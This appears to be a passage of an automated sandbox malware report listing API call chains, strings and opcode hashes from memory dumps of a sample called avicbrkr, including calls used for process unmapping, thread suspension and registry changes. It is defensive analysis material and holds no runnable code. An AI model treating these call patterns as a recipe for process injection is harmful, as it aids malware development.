                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$CriticalLeaveSection$AllocateTrimlstrlen
                      • String ID: EMPTY
                      • API String ID: 2541751434-1696604233
                      • Opcode ID: b89c83dbb421907c72edc0554dbbe78e668266a41b3b43b606bd00ad986ebeef
                      • Instruction ID: 6f4a29d4cbc304f0fa8326326635e7fd8422c1768418aa325c92ac4e3f64019a
                      • Opcode Fuzzy Hash: b89c83dbb421907c72edc0554dbbe78e668266a41b3b43b606bd00ad986ebeef
                      • Instruction Fuzzy Hash: B3018F72500218FFDF239F959C49CAF7F7DEB89760B108066F904A2220E67A4E50EB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • LoadLibraryA.KERNEL32(00638019), ref: 0063145E
                      • GetModuleHandleA.KERNEL32(00638019,00638000,?,?,0063178B,00000000,?,00637614), ref: 00631484
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: HandleLibraryLoadModule
                      • String ID: pnls$pnls
                      • API String ID: 4133054770-253294419
                      • Opcode ID: c6b46f3693df74f61e1cc71e5aea72fd665d8661b7ae3fca275f59ba8575b8b3
                      • Instruction ID: 82c0c1202a15d8a17d29cda161c5fc087ead71f2f73dcd54ad9d13d47cca7f13
                      • Opcode Fuzzy Hash: c6b46f3693df74f61e1cc71e5aea72fd665d8661b7ae3fca275f59ba8575b8b3
                      • Instruction Fuzzy Hash: 3EF0C272A00715BBDB248BE99D46FEF76EEDB09750F148115B901E3241DBA8ED0046E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Strings
                      • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 0038CAB1
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CountHandleModuleTickwsprintf
                      • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
                      • API String ID: 218054273-3263720277
                      • Opcode ID: 02e69d58531791534e43849f96d1fc02c3869bd6257161d8254300b81151aa2b
                      • Instruction ID: 3ee0ab9f7c4284d3a0733b584905713c070ee05a1f0b166e9a6cee91654e8882
                      • Opcode Fuzzy Hash: 02e69d58531791534e43849f96d1fc02c3869bd6257161d8254300b81151aa2b
                      • Instruction Fuzzy Hash: BB0148B6D00218BFCF01EF95DC09AEEBBB8EF08705F004052F901B6190E7759A54CBA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • StrChrA.SHLWAPI(?,0000002C), ref: 00372DB9
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • StrTrimA.SHLWAPI(00000000,003973F4), ref: 00372DD9
                        • Part of subcall function 003724A8: lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                        • Part of subcall function 003724A8: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                        • Part of subcall function 003724A8: lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                        • Part of subcall function 003724A8: CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                        • Part of subcall function 003724A8: CloseHandle.KERNEL32(00000000), ref: 00372517
                        • Part of subcall function 003724A8: GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                        • Part of subcall function 003724A8: HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateErrorFreeLastlstrlen$CloseCreateHandleThreadTrimlstrcpymemcpymemsetwsprintf
                      • String ID: L"7
                      • API String ID: 717256268-2580434585
                      • Opcode ID: 9613318f68cbb36bc9516477e1b8dc5cd05f6351f0bb91f8637a34fed82795cb
                      • Instruction ID: 1e9a7a0a82f0eddc4ac14e681654bac287f723b9a7b17dc4db55ac9bea4e9a99
                      • Opcode Fuzzy Hash: 9613318f68cbb36bc9516477e1b8dc5cd05f6351f0bb91f8637a34fed82795cb
                      • Instruction Fuzzy Hash: FBF08B332541909BC7333FB8AC46DBF2B5D9B46370F568425F92AF70D0CD1A4A406361
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 0038806B
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038807C
                      • GetLastError.KERNEL32(?,00000001,003880EB,00000000,0039C828,00000000,00378569,0000000D,0039C778,0000000D,0039C828,0000000D,0039EB2C,?,0037D9D1), ref: 003880BA
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterErrorFreeHeapLastLeave
                      • String ID: H}*
                      • API String ID: 132244544-3236088583
                      • Opcode ID: d81eb68aaf55f2678cc627bf9bc5093636ceb8f75f0ddd9ef677f9027cafec27
                      • Instruction ID: 355c2a8c72d57ffb4085e6f2d2b6e63717082a63b3c568b6174bee6b8f785317
                      • Opcode Fuzzy Hash: d81eb68aaf55f2678cc627bf9bc5093636ceb8f75f0ddd9ef677f9027cafec27
                      • Instruction Fuzzy Hash: 1801A2B5200704EFD7229F69CC05D6AB7FEEF84320F104569EA56937A0CB31ED058B64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 003877EC
                      • lstrcmp.KERNEL32(?,00000000), ref: 00387810
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038782A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeavelstrcmp
                      • String ID: H}*
                      • API String ID: 4188137280-3236088583
                      • Opcode ID: 967df6e42629420db180b7e872c37e7f3ac292f78cea488b1ff2a077323e3a82
                      • Instruction ID: 48f067ebf2e425eeba4566115a536855e6ad6b34767cfd1a9501a0ad979f51a6
                      • Opcode Fuzzy Hash: 967df6e42629420db180b7e872c37e7f3ac292f78cea488b1ff2a077323e3a82
                      • Instruction Fuzzy Hash: E2F0F636514300EBCB22AF01DC8ADA9B7BEFB00361F224095F80263250C735FC40DBA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • InterlockedIncrement.KERNEL32(0039D1A0), ref: 00372D63
                      • InterlockedDecrement.KERNEL32(0039D1A0), ref: 00372D8A
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                        • Part of subcall function 003720AD: lstrlen.KERNEL32(?,?,?,00000001), ref: 00372173
                        • Part of subcall function 003720AD: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00372195
                        • Part of subcall function 003720AD: lstrcpy.KERNEL32(00000020,?), ref: 003721B4
                        • Part of subcall function 003720AD: lstrlen.KERNEL32(?), ref: 003721BE
                        • Part of subcall function 003720AD: memcpy.NTDLL(?,?,?), ref: 003721FF
                        • Part of subcall function 003720AD: memcpy.NTDLL(?,?,?), ref: 00372212
                        • Part of subcall function 003720AD: SwitchToThread.KERNEL32(?,00000000,?,?), ref: 00372236
                        • Part of subcall function 003720AD: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00372255
                        • Part of subcall function 003720AD: HeapFree.KERNEL32(00000000,?,?), ref: 0037227B
                        • Part of subcall function 003720AD: HeapFree.KERNEL32(00000000,?,?), ref: 00372297
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$AllocateInterlockedlstrlenmemcpy$DecrementErrorIncrementLastSwitchThreadlstrcpywsprintf
                      • String ID: L"7
                      • API String ID: 2151281825-2580434585
                      • Opcode ID: 3432d12e1259c574f97d1a6f00555934cb215c86a724f7bbe17a60e092ca633b
                      • Instruction ID: b5ce24b59fffbe47cbe916afd140c490d4a550f3ba9dc683fa6951dd82cb7667
                      • Opcode Fuzzy Hash: 3432d12e1259c574f97d1a6f00555934cb215c86a724f7bbe17a60e092ca633b
                      • Instruction Fuzzy Hash: 31E0D8332540445BE7333BB8ACCB8EE276ED681371FA38516F92ED21E0DA2B4D416121
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memcpy.NTDLL(?,0039ECBD,0000001A,00000000,?,00000000,0037CD1F,?,00000000), ref: 0037C7B1
                      • lstrlen.KERNEL32(00000008,00000000), ref: 0037C9BC
                        • Part of subcall function 00378138: memset.NTDLL ref: 00378174
                        • Part of subcall function 00378138: HeapFree.KERNEL32(00000000,00000000), ref: 00378191
                        • Part of subcall function 00378138: memcpy.NTDLL(?,?,0037C7DD,?,0037C7DD,?,?,00000000,?,00000000,0037CD1F,?,00000000), ref: 003781B2
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                        • Part of subcall function 0037C531: WaitForSingleObject.KERNEL32(000001F4), ref: 0037C5B7
                      • HeapFree.KERNEL32(00000000,00000008,?), ref: 0037C96A
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                        • Part of subcall function 0037A9A8: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0037A9BF
                        • Part of subcall function 0037A9A8: memcpy.NTDLL(?,?,00004000,?,?,0037C95D,?,?), ref: 0037A9FD
                        • Part of subcall function 0037A9A8: HeapFree.KERNEL32(00000000,?), ref: 0037AA1F
                        • Part of subcall function 0037C6D4: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 0037C6F5
                        • Part of subcall function 00378249: memmove.NTDLL(00000000,00000000,00000000,?,00000000,0037AD5C,0039E51C,00000000,00000000,-00000039,?,0037AED1,?,00000000,?,00000000), ref: 0037828F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$Allocate$ObjectSingleWaitlstrlenmemmovememset
                      • String ID: Access-Control-Allow-Origin:
                      • API String ID: 1019252088-3194369251
                      • Opcode ID: 92884586d898ad935fecf75ad8daab22b0de3014235acd76109e57a9ab594c35
                      • Instruction ID: 9474fa106ad186c5afeff8b3ef01f0ce36d4d964c8ef7056b293cd9ed4268b8c
                      • Opcode Fuzzy Hash: 92884586d898ad935fecf75ad8daab22b0de3014235acd76109e57a9ab594c35
                      • Instruction Fuzzy Hash: 5AA1AE71610201EFDF66DF65C885AAA7BA8BF08310F159199FC49AF256DB78EC40CF90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 0038D4B2
                        • Part of subcall function 0038D2FD: memset.NTDLL ref: 0038D339
                      • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0038D53C
                      • WaitForSingleObject.KERNEL32(00000064), ref: 0038D54A
                      • SuspendThread.KERNEL32(?), ref: 0038D55D
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpymemset$Thread$CloseErrorHandleObjectResumeSectionSingleStatusSuspendUnmapViewWait
                      • String ID:
                      • API String ID: 398184711-0
                      • Opcode ID: cc6aecec498ca418648717ae93a6550fd0e8466ac2a24fe7393a832b33eaa0db
                      • Instruction ID: 710afc8388382f9a34c02a8e1c78f84687b45d20501ba752130075006617feeb
                      • Opcode Fuzzy Hash: cc6aecec498ca418648717ae93a6550fd0e8466ac2a24fe7393a832b33eaa0db
                      • Instruction Fuzzy Hash: 904180B1108301AFEB12EF54CC81E6ABBE9FF89354F10492EF695961A0DB31D914CB62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00632130
                        • Part of subcall function 00631F7B: memset.NTDLL ref: 00631FB7
                      • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 006321BA
                      • WaitForSingleObject.KERNEL32(00000064), ref: 006321C8
                      • SuspendThread.KERNEL32(?), ref: 006321DB
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,?,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631D5F
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631DB0
                        • Part of subcall function 00631C29: memcpy.NTDLL(?,00632486,00000800,?,?,?,00000000), ref: 00631E20
                        • Part of subcall function 00631C29: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00631E4B
                        • Part of subcall function 00631C29: RtlNtStatusToDosError.NTDLL(00000000), ref: 00631E52
                        • Part of subcall function 00631C29: CloseHandle.KERNEL32(00000000), ref: 00631E61
                        • Part of subcall function 00631C29: memset.NTDLL ref: 00631E75
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpymemset$Thread$CloseErrorHandleObjectResumeSectionSingleStatusSuspendUnmapViewWait
                      • String ID:
                      • API String ID: 398184711-0
                      • Opcode ID: 7bd13bf0a7f48ae9bb82bf3ca4d60127a604c9bbd521bc29df937e8ac838ca4f
                      • Instruction ID: 3f7686a4f0f71c1f4435651ec470583824b68e18a86214a526e7be2e9741a191
                      • Opcode Fuzzy Hash: 7bd13bf0a7f48ae9bb82bf3ca4d60127a604c9bbd521bc29df937e8ac838ca4f
                      • Instruction Fuzzy Hash: F7315E72108302AFE751DF54CD81EABBBEAFF88350F10492DFA9496260D731D964CB96
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(00000001,?,00000008), ref: 003907F6
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • mbstowcs.NTDLL ref: 00390814
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • GetLastError.KERNEL32(?,?,00000001), ref: 00390869
                      • FreeLibrary.KERNEL32(?,?,00000001), ref: 003908D1
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$AllocateErrorLastLibrarylstrlenmbstowcs
                      • String ID:
                      • API String ID: 3913308073-0
                      • Opcode ID: 80ec4c60937b5c98f603b6de400450befcbf1165b1678a5b1a2ec5e62bce77af
                      • Instruction ID: 9349819328185f6aa4e477b618af789757cff193fcaac24adb6e1de7ef71f60c
                      • Opcode Fuzzy Hash: 80ec4c60937b5c98f603b6de400450befcbf1165b1678a5b1a2ec5e62bce77af
                      • Instruction Fuzzy Hash: 6941E775E00209EFCF16DFE4C8888ADBBB5FF48315B1444A9E515AB651C735AD82CF90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0038FB3F), ref: 0038F5A1
                      • lstrlen.KERNEL32(?), ref: 0038F5D1
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memcpy.NTDLL(00000000,?,?), ref: 0038F640
                      • memcpy.NTDLL(00000008,003973F8,00000002,00000000,?,?), ref: 0038F655
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapTimememcpy$AllocateFileFreeSystemlstrlen
                      • String ID:
                      • API String ID: 4127713103-0
                      • Opcode ID: b524bb235cf667ee226b1d35a7b5ecc1b2ff0456312edc5a50240872e9817c91
                      • Instruction ID: 2de0f964e4a3211e5748210a74660cba4c426895bcc0f2985b88d0f627414e18
                      • Opcode Fuzzy Hash: b524bb235cf667ee226b1d35a7b5ecc1b2ff0456312edc5a50240872e9817c91
                      • Instruction Fuzzy Hash: E9311E75A00209EFDB12EFA8CC85EAEB7F8EF44304B114565F815E7251EA34EA158B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,00637614), ref: 0063427A
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • RegEnumKeyExA.ADVAPI32(00000000,?,00000000,00637614,00000000,00000000,00000000,00000000,00000104,00000000,?,00637614), ref: 006342C1
                      • WaitForSingleObject.KERNEL32(00000000,?), ref: 0063432E
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                        • Part of subcall function 00632EC0: StrChrA.SHLWAPI(!Cc,0000005F), ref: 00632F03
                        • Part of subcall function 00632EC0: lstrcpy.KERNEL32(?,?), ref: 00632F1B
                        • Part of subcall function 00632EC0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00632F51
                        • Part of subcall function 00632EC0: lstrlenW.KERNEL32 ref: 00632F88
                        • Part of subcall function 00632EC0: RtlAllocateHeap.NTDLL(00000000,?), ref: 00632F9D
                        • Part of subcall function 00632EC0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FE8
                        • Part of subcall function 00632EC0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FFA
                        • Part of subcall function 00632EC0: lstrcmpiW.KERNEL32(00000000), ref: 00633011
                        • Part of subcall function 00632EC0: lstrcpy.KERNEL32(?,006380FA), ref: 00633053
                        • Part of subcall function 00632EC0: lstrcpy.KERNEL32(?,?), ref: 006330AC
                        • Part of subcall function 00632EC0: RegCreateKeyA.ADVAPI32(?,?,?), ref: 006330C0
                        • Part of subcall function 00632EC0: RegQueryValueExA.ADVAPI32(?,00638256,00000000,?,?,?), ref: 006330E3
                        • Part of subcall function 00632EC0: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 00633146
                        • Part of subcall function 00632EC0: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 00633161
                        • Part of subcall function 00632EC0: RegDeleteValueW.ADVAPI32(?,006376D0), ref: 0063316F
                        • Part of subcall function 00632EC0: RegCloseKey.ADVAPI32(?), ref: 00633178
                        • Part of subcall function 00632EC0: RegCloseKey.ADVAPI32(?), ref: 00633181
                        • Part of subcall function 00632EC0: HeapFree.KERNEL32(00000000,?,?), ref: 00633196
                        • Part of subcall function 00632EC0: HeapFree.KERNEL32(00000000,00000000), ref: 006331B9
                        • Part of subcall function 00632EC0: RegCloseKey.ADVAPI32(?), ref: 006331CB
                      • RegCloseKey.ADVAPI32(?,00000104,00000000,?,00637614), ref: 00634356
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$CloseOpen$CreateFreelstrcpy$AllocateDirectoryValue$DeleteEnumObjectQuerySingleWaitlstrcmpilstrlen
                      • String ID:
                      • API String ID: 3364410921-0
                      • Opcode ID: f1b1a1f8126bd404091c84787464dfd4754a576ca010298334b3bf7e837a75da
                      • Instruction ID: 4edb94e524c072aff7d303e1f9bda4afc38582dff1a783323a36519e7ee79752
                      • Opcode Fuzzy Hash: f1b1a1f8126bd404091c84787464dfd4754a576ca010298334b3bf7e837a75da
                      • Instruction Fuzzy Hash: FD311871C00119AADF21AFA6CC858EEFFBAEF49350F10416AF561B3220D6715A50DBD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00378174
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00378191
                      • memcpy.NTDLL(?,?,0037C7DD,?,0037C7DD,?,?,00000000,?,00000000,0037CD1F,?,00000000), ref: 003781B2
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapmemcpymemset
                      • String ID: chun
                      • API String ID: 2272576838-3058818181
                      • Opcode ID: a338dacef09c8b8556f679da493ed00119669e6bd68b41139c4ae3a232eea705
                      • Instruction ID: d78fe96b7ad19afcff204642b7321ff226b53350f30a3bce2f15484b2e40b521
                      • Opcode Fuzzy Hash: a338dacef09c8b8556f679da493ed00119669e6bd68b41139c4ae3a232eea705
                      • Instruction Fuzzy Hash: 80318D31644705AFDB339F66DC45B16BBE8EF14720F01882AF94E9B661DB74E902CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(?,00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391203
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,003916D0,?,0039F9E0), ref: 0039122C
                      • LoadLibraryW.KERNEL32(-0000FFFE), ref: 0039126F
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • FreeLibrary.KERNEL32(00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391301
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapLibrary$AllocateCurrentDirectoryLoadlstrlen
                      • String ID:
                      • API String ID: 4161714574-0
                      • Opcode ID: df683ca6b1f4b3331f93e812596bd0265654d4325c3dcc21670c7785df002300
                      • Instruction ID: e40b9a2ffd763f62484c0918a00d292cb363342e3359e89062502a5a3270232d
                      • Opcode Fuzzy Hash: df683ca6b1f4b3331f93e812596bd0265654d4325c3dcc21670c7785df002300
                      • Instruction Fuzzy Hash: F3318C71914707BFDB236F659C85A9BBBECEF04390F018826F445E2691DB75D8108BA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 006337AB
                      • GetLastError.KERNEL32(?,00000318,00000008), ref: 0063389E
                        • Part of subcall function 00633D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633D6C
                        • Part of subcall function 00633D34: SetLastError.KERNEL32(00000000), ref: 00633D73
                        • Part of subcall function 00633C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633CA9
                      • memcpy.NTDLL(00000218,00634E62,00000100,?,00010003,?,?,00000318,00000008), ref: 00633826
                        • Part of subcall function 00633CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633D20
                        • Part of subcall function 00633CF3: SetLastError.KERNEL32(00000000,?,006319D6,?,00000004,0063244E,00000004,?,?,?,?,006322FD,00000000,0063244E,CCCCFEEB,00000000), ref: 00633D27
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00633880
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Status$Last$memcpymemset
                      • String ID:
                      • API String ID: 945571674-0
                      • Opcode ID: 62ba75bb9486e843b1ba3f2530d48286ccfd1534e5aaea40af4bb3e05d2eef7f
                      • Instruction ID: 8db0eb0341f9fe764f881fd6f56fb9403ad1820a069e5191bd122eef0344bc5b
                      • Opcode Fuzzy Hash: 62ba75bb9486e843b1ba3f2530d48286ccfd1534e5aaea40af4bb3e05d2eef7f
                      • Instruction Fuzzy Hash: 64313C7190161AAFDB21DF64CD85AEAB7BAFF04304F10496EF546E6750DB30AE448B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00388D31
                      • GetLastError.KERNEL32(?,00000318,00000008), ref: 00388E24
                        • Part of subcall function 00389524: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038955C
                        • Part of subcall function 00389524: SetLastError.KERNEL32(00000000), ref: 00389563
                        • Part of subcall function 00389481: RtlNtStatusToDosError.NTDLL(00000000), ref: 00389499
                      • memcpy.NTDLL(00000218,00395622,00000100,?,00010003,00083097,?,00000318,00000008), ref: 00388DAC
                        • Part of subcall function 003894E3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00389510
                        • Part of subcall function 003894E3: SetLastError.KERNEL32(00000000,?,00388DE7,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 00389517
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00388E06
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Status$Last$memcpymemset
                      • String ID:
                      • API String ID: 945571674-0
                      • Opcode ID: f6d0d979cb577ea4111cd1900400f69f0ebc2da22aebd98a83c0b16ff18aebe9
                      • Instruction ID: 43d31f916cd0ef0d3b438aa389929c6b74a9165aa151214d19728e0e5a8dbd4e
                      • Opcode Fuzzy Hash: f6d0d979cb577ea4111cd1900400f69f0ebc2da22aebd98a83c0b16ff18aebe9
                      • Instruction Fuzzy Hash: 8831A47190030AEFDB22EF64DC85AAAB7F8FF04304F5045AAE546D7141EB30EE448B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 003768AE
                      • memcpy.NTDLL(00000018,?,?), ref: 003768D7
                      • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000579A,00000000,000000FF,00000008), ref: 00376916
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00376929
                      Memory Dump Source
